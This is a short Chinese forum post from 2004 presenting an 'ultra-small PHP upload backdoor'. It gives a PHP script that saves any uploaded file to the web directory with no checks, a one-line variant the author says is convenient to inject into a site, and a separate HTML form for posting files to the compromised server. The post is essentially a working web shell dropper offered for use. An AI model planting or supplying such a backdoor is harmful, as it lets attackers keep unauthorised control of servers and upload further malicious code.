标题:
[注意]一个超小型PHP上传型后门
[打印本页]
作者:
cnangel
时间:
2004-5-28 00:26
标题:
[注意]一个超小型PHP上传型后门
<?
$fname = $_FILES['MyFile']['name'];
$do = copy($_FILES['MyFile']['tmp_name'],$fname);
if ($do)
{
echo"上传成功<p>";
echo "http://".$SERVER_NAME."".dirname($PHP_SELF)."/".$fname."";
} else {
echo "上传失败";
}
?>
<form ENCTYPE="multipart/form-data" ACTION="<?php echo"".$PHP_SELF.""; ?>" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE="提交" TYPE="submit">
</from>
复制代码
够精简的吧?其实还可以更精简的。但我只是为了使用方便,加了一个判断。这个是一体化的,界面和代码在一个文件里面。
再给一个超级小小小小的,和表单是分离。而且只有一行代码。方便大家写入了吧?如果需要转义引号,大家看情况自己加吧。
<?php $msg = copy($_FILES['MyFile']['tmp_name'],$_FILES['MyFile']['name']) ? "上传成功" : "上传失败";echo $msg;?>
复制代码
本地提交表单的代码如下:
<form ENCTYPE="multipart/form-data" ACTION="这里是实际的URL" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE="提交" TYPE="submit">
</from>
复制代码
欢迎光临 星星博客 (http://commerce.huhoo.net/)
Powered by Discuz! 7.0.0
